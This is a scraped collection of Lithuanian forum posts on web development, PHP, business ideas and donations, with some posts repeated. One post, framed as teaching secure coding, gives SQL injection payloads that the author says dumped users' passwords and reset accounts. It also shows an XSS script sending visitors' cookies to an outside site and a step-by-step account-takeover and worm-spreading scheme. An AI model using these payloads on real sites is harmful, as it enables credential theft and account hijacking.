Fantasya

tai toki ir su htmlu galima parasyt, o nuotraukom pavartyt pilna scriptu. pasigooglink su jquery paruostu darbeliu. ir vaizdas bus grazus ir nieko programuot nereiks. o jei tau cia per sunku tai PM numesk. galesiu pagelbet

pinigu visad galima surast is kur paimt, o ideju ne. taip, kad jei turi pinigu, tai dar nereiskia kad turesi puiku versla. o jei cia visi taip metytu idejas ant kiekvieno kampo, tai jau seniai kiekvienas vairuotume po mersa uz keleta simtu gabalu

pinigu visad galima surast is kur paimt, o ideju ne. taip, kad jei turi pinigu, tai dar nereiskia kad turesi puiku versla. o jei cia visi taip metytu idejas ant kiekvieno kampo, tai jau seniai kiekvienas vairuotume po mersa uz keleta simtu gabalu

rase pries koki menesi, kad priimines sms apmokejimus paypalas, bet tikriausiai dar nepadare

Kas ieškos tas ras (kaip apeiti) :D O jeigu realiai žiūrint, tai neverta apkrauti tiek kliento tiek serverio bereikalingom apsaugom. Geriausias būdas apsisaugoti pasidaryti monitoringo sistemą ir stebėti tiek užklausų dažnumą, tiek žaidimo ekonomiką, tiek tikrinti gaunamus paketus. Tokiu atveju visada galima pastebėti kas išsiskiria iš minios :)

Pvz kiekvienas zaidejas turi savo objekta, kuriame yra funkcija tick() ar kazkas panasaus, kurioje visi laikai padidinami ir i ja kreipiasi pagrindine funkcija kas tam tikra laika (siuo atveju 600ms).
 
O pati ji atrodytu taip:
 
 

void Zaidejas::tick() { if (sovimoLaikas > 0) { sovimoLaikas--; if (sovimoLaikas <= 0) { atliktiSovima(); sovimoLaikas = 0; } } }
 
 
Aisku, cia primityvus variantas, jei nori sudetingiau bet universaliau - darai uzduociu sistema, i kuria idejus koki tai veiksma ji atliktu po kazkiek laiko ir t.t., bet cia gerokai sudetingiau :)

Kas nutiktų, jei kiekvienas pasaulio gyventojas turėtų po automatinį ginklą? Turbūt įsivyrautų anarchija ir chaosas.
 
PHP yra viena iš lengviausiai įsisavinamų programavimo kalbų, o atsižvelgiant į tai, kad nuolat didėja žmonių žingeidumas ir domėjimasis IT, tai dažnas jų bando kurti web sprendimus, kas ir yra (web sprendimai) tie automatiniai ginklai apie kuriuos užsiminiau.
 
Programos yra skirtos apdoroti ir dirbti su dideliais duomenų kiekiais, o informacijos valdymas šiais laikais ir yra didžiausias ginklas, juk ne veltui sakoma – kas valdo informaciją, tas valdo pasaulį. Kasdien mes registruojamės įvairiuose interneto platybių vietose ir ten pateikiame savo duomenis, slaptažodžius. O kas būtų, jei vieną dieną visai tai būtų paviešinta? Turbūt nieko gero...
 
O dabar prie techninių detalių. Iš patirties galiu pasakyti, kad būdų (kalbu apie web) rasti priėjimą prie įmonės duomenų yra N, bet šįkart norėčiau aptarti dažniausiai pasitaikančius du, kurie yra lengviausiai aptinkami ir išnaudojami.
 
SQL injection
 
SQL injekcijos tikslas yra išnaudoti galimybę pateikti formos arba GET užklausos kintamajį taip, kad galėtume pakoreaguoti originalią užklausą savo naudai. Niekada nemėgau teorijos ir visada buvau praktikas, tai tikiu, kad ir jums pavyzdys bus patogiau:
Taip atrodo kodas, esantis serveryje.

$vartotojas=$_POST[„user“]; $uzklausa="SELECT * FROM users WHERE name='$vartotojas’";
O kas būtų, jei vartotojo langelyje įrašytume
' or '1'='1 ?
Rezultatas gautųsi toks:

$uzklausa="SELECT * FROM users WHERE name='’ or ‘1’=’1’";
 
Suformavę tokią užklausą gauname, kad visada yra tenkinama sąlyga, nes 1 visada lygu 1. Tai buvo pats paprasčiausias pavyzdys, kuris pateikiamas kiekviename SQL injection straipsnyje, bet jei manote, kad viskas čia tuo ir apsiriboja, tai galiu pasakyti, kad klystate, nes realioje situacijoje tenka pakankamai pavargti, kartais ir paspėlioti, kol perprantama, kaip teisingai suformuoti užklausą.
 
Turiu vieną katalogą, kuriame kartais išsisaugau tokius dalykus, tai štai jums gyvenimiškesni pavyzdžiai:
 
Čia per slaptažodžio priminimo formą galėjau atsisiųsti kitų vartotojų slaptažodžius

' or email='[email protected]' union select '[email protected]',concat(email,':',DECODE(password,'client')) from clients limit 100,1 #
 
Čia per slaptažodžio keitimo formą galėjau pakeisti slaptažodį betkuriam vartotojui.

', 'site_administrators') or password=password AND id = '458' AND 'a'='a' #
 
Čia reikėjo sužinoti lentelės stulpelių pavadinimus žinant jos pavadinimą.

' limit 0 union select 1,(SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_NAME='users' limit 0,1) COLLATE utf8_unicode_ci,3,4,5,6,7,8,9 from users where password!='admin' or '
 
Traukiu slaptažodžius

' limit 0 union select 1,(SELECT CONCAT(id,'|',namex,'|',passwordx,'|',permission,'|',email,'|',u_name,'|',u_surname,'|',company,'|',admin_title) FROM users limit 0,1),3,4,5,6,7,8,9 from users where password!='admin' or '
 
Aš čia tikrai nesurašysiu visų galimų atvejų, nes tai būtų neįmanoma, o kiekvienas toks potyris yra unikalus, bet noriu sudominti, kad domėtumėtės ir bandytumėte, nes jūs niekada neparašysite saugaus kodo, kol į viską nepažvelgsite iš tos kitos pusės – saugumo specialisto pusės.
 
XSS (Cross site scripting)
 

„<script>alert(„Jūs buvote nulaužtas“)</script> bla=”
 
Tai yra XSS atakos pavyzdys, bet jo panaudojimas yra pateiktas iš standartinių XSS pavyzdžių. Pirmiausiai aptarkime jo technines panaudojimo galimybes, o tada prieisime prie jo praktiškesnio panaudojimo galimybių.
 
HTML laukelis

<input type=”text” value=”<?=$_GET[‘kintamasis1’]?>”>
 
Suformuota užklausa

www.svetaine.lt/?kintamasis1=x“ <script>alert(„Jūs buvote nulaužtas“)</script
 
Rezultatas HTML’E

<input type=”text” value=”x” <script>alert(„Jūs buvote nulaužtas“)</script>“
 
Rezultatas svetainėje yra akivaizdžiai matomas – jums iššoks lentelė, kad buvote nulaužtas. Tačiau tai, kad jūs pamatysite tokią lentelę naudos neduoda, tačiau dažnai galima susidurti su problema, kai tokie duomenys yra išsaugomi duomenų bazėje ir jie atvaizduojami kitiems lankytojams. Bet vėl gi, kokia jums nauda, jei ši lentelė iššoks kažkam? Atsakymas paprastas – jokios.
 

<script>document.location='http://www.tavosvetaine.lt/skriptas.php?sesija='+document.cookie</script>
 
Štai čia ir prasideda visas įdomumas. Pateiktame pavyzdyje lankytojas yra nukreipiamas į jūsų svetainės skriptą, kuriam perduodamas lankytojo sesijos ID. Toliau yra tik vienas kelias. Jūsų skriptas turėdamas sesijos ID gali naudodamas CURL biblioteką prisijungti prie „aukos“ paskyros ir atlikti jums reikalingus veiksmus (keisti duomenis ir pan.).
 
Žinau, kad laukiate realaus pavyzdžio, tai jūsų negalima nuvilti. Anksčiau šis pažeidžiamumas egzistavo vienoje pažinčių svetainėje, kai savo anketos formoje galėjai įrašyti tokį kodą. Kaip tai buvo galima išnaudoti? Slaptažodžiai pas juos DB buvo nekoduojami (slaptažodžio priminimo funkcija atsiunčia ne naują slaptažodį, o esantį).
 
Eiga:

Patalpinama kodą savo anketoją ir paruošiame skriptą, kuris perims sesijos duomenis.
Užeiname į kelių narių anketas ir 90% jų aplanko tavąją.
Perimamme jų sesijos ID ir pakeičiame jų paskyros el. paštą į savo.
Atsisiunčiame slaptažodį.
El. paštą atstatome į originalų, kad liktume nepastebėti.
Jų anketoje įdiegiame kenksmingą javascript.

 
Rezultate gausime, kad kenksmingas kodas labai greit išplis per visų narių anketas, o į mūsų pašto dėžutę suplauks daugybė slaptažodžių.
 
Apibendriminas
 
Šį straipsnį rašiau ne tam, kad jis būtų panaudotas blogiems tikslams, bet atvirkščiai – kad taptumėte geresniais programuotojais. Pasirinkdami šią specialybė jūs privalote suprasti, jog jūsų rankose bus neįkainuojama informacija, kurią jums patikės jūsų darbdaviai, klientai, o vieną kartą juos nuvylę daugiau galite ir nebe susigrąžinti. Tikiuosi, kad šis straipsnis padės jums suvogti, jog neužtenka vien sukurti produktą, bet reikia, kad jis būtų ir saugaus, nes šiuolaikinis verslas yra informacijos verslas.
 
P.S Apmaudu, kad savo praktikoje teko susidurti su ne vienu vadovu, kurie investuoja didžiules sumas į produktų sukūrimą, bet visiškai neįvertina fakto, kad jų verslas gali būti sužlugdytas per 1 valandos saugumo auditą. Šioje vietoje įžvelgiu labai gerą verslo nišą, nes Lietuvoje yra tik kelios rimtos įmonės, kurios gali atlikti saugumo auditus, bet viskam savas laikas...

Galvojat išmokins jus universitetas programuot? Jei jums būtų idomu tai jau mokyklos laikais turėtumėt bent minimalias žinias ir nepergyventumėt dėl informatikos egzo, nes jį išlaikyt ir gaut gerus procentus lengva kaip du pirštus apmyžt.
Na nežinau kaip VU, bet aš studijuoju VGTU ir mokinuos tą programavimą. Galiu drąsiai pasakyt, kad universitetas manes visiškai nieko neišmokino programavimo srityje. Ko man reikėjo tą pats išmokau internete.

geriau pakurt koki universitetu tinklapi suskirstyta i specialybes, kur zmones galetu keistis laboratoriniais ir konspektais. vat toki tai uzskaityciau. tik aisku reiktu geros reklamos, kad studentai lankytusi ir ne tik leechintu bet ir seedintu

Sveiki uždarbis.lt dalyviai!!!1!!vienasvienas
 
Prikaupiau šiek tiek Hostex nuolaidų kuponų. Norėčiau padovanoti juos sąžiningiems bei pilnų idėjomis žmonėms :)

 
 
Hosting'ų kainos ir užsakymai:
http://www.hostex.lt/hostingas
 
Trumpai apie nuolaidos kodą:
Nuolaida yra pirmam shared hosting'o užsakymui hostex'e, max metams. Paslaugų pratęsimui jis negalioja. Taip pat, jei užsisakysite planą trims mėnesiams, vėliau tęsti reikės už įprastą kainą.
Iš karto atsakau į klausimus:
1. VPS'ams negalioja,
2. Domeno užsakymui taip pat negalioja,
 
 
Kas nori gauti nuolaidos kodus, parašykit šitoj temoj. JOKIŲ PM NESIŲSKIT!!!
Kiekvienam žmogui kodą atsiųsiu į PM.
Nuolaidos kodų yra ~150 :)

aha, patvirtini kita zmogu ir jis paskui tavo vardu viska scamina..

o ne paprasciau iskart kolonelei akumuliatoriu nusipirkt, o ne isimt is mopedo ir tada mopedui pirkt akumuliatoriu?

o ne paprasciau iskart kolonelei akumuliatoriu nusipirkt, o ne isimt is mopedo ir tada mopedui pirkt akumuliatoriu?

Sakau, bet kokie headeriai (tarp jų ir redirectai, cookies) turi eiti prieš outputinant bet kokį HTML. Net ir tuščia eilutė gali sutrukdyti :)

su kuo rašai kodus ir kokia koduote išsaugai?
notepad++ yra opcija "UTF-8 without BOM"
tada jau veiks jei nebus jokiu tarpu ir jokio html'o

header() funkcija turi eiti prieš bet kokį html kodą. Redirectinti gali ir su javascript :)

naudok ob_start();
ir ob_end_flush();

Nesu prieš Japonus, bet manyčiau, kad Jie patys turi daug pinigų ir tikrai atsistatys, plius Jiems padės visas pasaulis. O tie, kurie aukoja ir šaukia, ant kitų, kad neaukoja manyčiau esat žiniasklaidos aukos ir tiek, todėl jog tik žiniasklaidos dėka galvojat, kad jiems yra blogai ir reikia aukoti.
O pamirštat vieną dalyką, kad pvz: Jūsų kaimynui ar Lietuvoje esančiam vaikui yra irgi Labai blogai, bet deja žiniasklaida to nereklamuoja ir Jūs to nežinote.
Norite aukoti - Nuostabu aš už Jus tik aukokite tiems, kam manyčiau tie pinigai yra labiau reikalingi...
Siūlau aukoti:
https://www.aukok.lt/
http://www.pagalbadaiktais.lt/
 
P.s Uždarbis.lt irgi galėtų būti socialiai atsakingas ir prisidėti reklama:
http://www.pagalbareklama.lt

Nesamone cia tie aukojimai. Zmonems smegenu plovimas ir tiek. Japonija ir taip stipri salis ir gali pati susitvarkyt. Tegu aukoja valstybe, o ne zmones. Sitie varguoliu aukojimai tik parodo, jog siam pasauly neegzistuoja valstybes, o tik zmones (vienetai), bet kadangi taip nera, tai cia paprasciausias ir gana sekmingas budas uzsidirbt pinigu. Cia panasi istorija kaip su tuo suniu Pipiru kur nuo tilto numete. Graziai parodai ir zliumbia visi zmones. Todel jus niekad ir nebusit milijonieriais. Jus teliksit vartotojais aukojanciais milijonieriams pasakiskus pinigus. Sekmes, as sikart pabusiu milijonieriu puseje :rolleyes: Peace.
 
Aisku dabar visokie del "Pipiru" pamete galvas mane uzbadys, bet tegu bado. Kuo daugiau tokiu zmoniu, tuo man bus lengviau ko nors pasiekt :lol: Visad atsiras, kas pasinaudos zmoniu jausmais, todel nereik leist jiems vieniems to daryt. Reik konkuruot su jais B-)

Autorius atrodo labiau nori atkeršyt pardavejui nei atgaut pinigus...

Pasidomek apie PHP daemon. Geriausias variantas aisku butu susirasti kas tau viska parasytu ant c++.

dziaukites, dziaukites.. dar nezinot kur pakliusit baige mokyklas.. tada savo noru ir i -50 eisit

dziaukites, dziaukites.. dar nezinot kur pakliusit baige mokyklas.. tada savo noru ir i -50 eisit

dziaukites, dziaukites.. dar nezinot kur pakliusit baige mokyklas.. tada savo noru ir i -50 eisit

dziaukites, dziaukites.. dar nezinot kur pakliusit baige mokyklas.. tada savo noru ir i -50 eisit